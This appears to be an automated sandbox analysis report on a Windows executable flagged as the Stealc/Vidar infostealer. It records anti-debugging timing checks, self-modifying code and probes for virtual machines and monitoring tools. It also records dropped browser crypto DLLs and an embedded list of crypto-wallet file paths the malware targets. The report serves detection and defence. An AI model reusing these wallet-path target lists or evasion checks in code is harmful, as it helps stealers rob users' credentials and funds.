Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50605D7 second address: 50605F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50605F5 second address: 50605F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50605F9 second address: 50605FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50605FF second address: 5060642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA6412h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 dec edi 0x0000000a jmp 00007EFD88CA6410h 0x0000000f lea ebx, dword ptr [edi+01h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007EFD88CA6417h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060642 second address: 50606E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 851Ah 0x00000007 push ebx 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov al, byte ptr [edi+01h] 0x0000000f pushad 0x00000010 call 00007EFD88B5ADC3h 0x00000015 pushfd 0x00000016 jmp 00007EFD88B5ADC8h 0x0000001b add esi, 0DDC9FB8h 0x00000021 jmp 00007EFD88B5ADBBh 0x00000026 popfd 0x00000027 pop eax 0x00000028 mov bx, D6FCh 0x0000002c popad 0x0000002d inc edi 0x0000002e jmp 00007EFD88B5ADBBh 0x00000033 test al, al 0x00000035 pushad 0x00000036 mov cx, 39FBh 0x0000003a mov ebx, eax 0x0000003c popad 0x0000003d jne 00007EFDF88E3189h 0x00000043 pushad 0x00000044 jmp 00007EFD88B5ADC8h 0x00000049 mov edx, esi 0x0000004b popad 0x0000004c mov ecx, edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007EFD88B5ADC3h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50606E5 second address: 5060703 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push esi 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b shr ecx, 02h 0x0000000e jmp 00007EFD88CA640Ah 0x00000013 rep movsd 0x00000015 rep movsd 0x00000017 rep movsd 0x00000019 rep movsd 0x0000001b rep movsd 0x0000001d pushad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060703 second address: 506072D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007EFD88B5ADBAh 0x0000000a xor cl, 00000038h 0x0000000d jmp 00007EFD88B5ADBBh 0x00000012 popfd 0x00000013 popad 0x00000014 mov bh, al 0x00000016 popad 0x00000017 mov ecx, edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 506072D second address: 5060731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060731 second address: 5060735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060735 second address: 506073B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 506073B second address: 5060741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060741 second address: 5060745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060745 second address: 5060765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 03h 0x0000000b jmp 00007EFD88B5ADBDh 0x00000010 rep movsb 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060765 second address: 5060769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060769 second address: 506076D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 506076D second address: 5060773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060773 second address: 5060779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060779 second address: 50607BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA640Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-04h], FFFFFFFEh 0x00000012 jmp 00007EFD88CA6410h 0x00000017 mov eax, ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007EFD88CA6417h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50607BD second address: 50607C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50607C3 second address: 50607C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50607C7 second address: 50607D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp-10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50607D8 second address: 50607DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50607DC second address: 50607E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50607E2 second address: 506080F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88CA640Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007EFD88CA6415h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 506080F second address: 506082F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, di 0x00000010 mov ax, dx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 506082F second address: 5060835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060835 second address: 5060839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060839 second address: 5060889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jmp 00007EFD88CA6416h 0x0000000e pop esi 0x0000000f jmp 00007EFD88CA6410h 0x00000014 pop ebx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007EFD88CA640Ch 0x0000001e and cl, 00000068h 0x00000021 jmp 00007EFD88CA640Bh 0x00000026 popfd 0x00000027 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060889 second address: 50604A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 4295A55Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, 3199387Bh 0x0000000e popad 0x0000000f leave 0x00000010 jmp 00007EFD88B5ADBEh 0x00000015 retn 0008h 0x00000018 cmp dword ptr [ebp-2Ch], 10h 0x0000001c mov eax, dword ptr [ebp-40h] 0x0000001f jnc 00007EFD88B5ADB5h 0x00000021 push eax 0x00000022 lea edx, dword ptr [ebp-00000590h] 0x00000028 push edx 0x00000029 call esi 0x0000002b push 00000008h 0x0000002d jmp 00007EFD88B5ADC7h 0x00000032 push 74910AEFh 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007EFD88B5ADC5h 0x0000003e add esi, 58910F06h 0x00000044 jmp 00007EFD88B5ADC1h 0x00000049 popfd 0x0000004a pushfd 0x0000004b jmp 00007EFD88B5ADC0h 0x00000050 or esi, 49F495A8h 0x00000056 jmp 00007EFD88B5ADBBh 0x0000005b popfd 0x0000005c popad 0x0000005d add dword ptr [esp], 00551139h 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007EFD88B5ADC0h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060935 second address: 5060939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060939 second address: 5060956 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060956 second address: 5060970 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFD88CA640Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060970 second address: 506097F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD88B5ADBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 506097F second address: 5060985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060985 second address: 5060989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 5060989 second address: 50609CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov si, 9F23h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007EFD88CA6416h 0x00000015 sub ah, 00000068h 0x00000018 jmp 00007EFD88CA640Bh 0x0000001d popfd 0x0000001e mov dx, cx 0x00000021 popad 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50609CA second address: 50609CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50609CE second address: 50609D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50609D4 second address: 50609DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50609DA second address: 50609DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	RDTSC instruction interceptor: First address: 50609DE second address: 50609E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Special instruction interceptor: First address: 75F95E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Special instruction interceptor: First address: 75FA64 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Special instruction interceptor: First address: 8FD90C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Special instruction interceptor: First address: 98564B instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Code function: 0_2_6C59EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6C59EBF0

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: 0vsAIy0DhJ.exe, 0vsAIy0DhJ.exe, 00000000.00000002.2004288990.00000000008DC000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001073000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@o
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2004288990.00000000008DC000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: NTICE
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: SICE
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Code function: 0_2_6C66AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C66AC62

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Code function: 0_2_6C66AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C66AC62

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 0vsAIy0DhJ.exe PID: 2004, type: MEMORYSTR

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Code function: 0_2_6C6B4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6C6B4760

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Code function: 0_2_6C591C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

0_2_6C591C30

Source: 0vsAIy0DhJ.exe, 0vsAIy0DhJ.exe, 00000000.00000002.2004288990.00000000008DC000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: #Program Manager

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Code function: 0_2_6C66AE71 cpuid

0_2_6C66AE71

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Code function: 0_2_6C66A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6C66A8DC

Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe

Code function: 0_2_6C5B8390 NSS_GetVersion,

0_2_6C5B8390

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2003720246.0000000000511000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1678322710.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0vsAIy0DhJ.exe PID: 2004, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: 0vsAIy0DhJ.exe PID: 2004, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000594000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.00000000005C5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \ElectronCash\wallets\
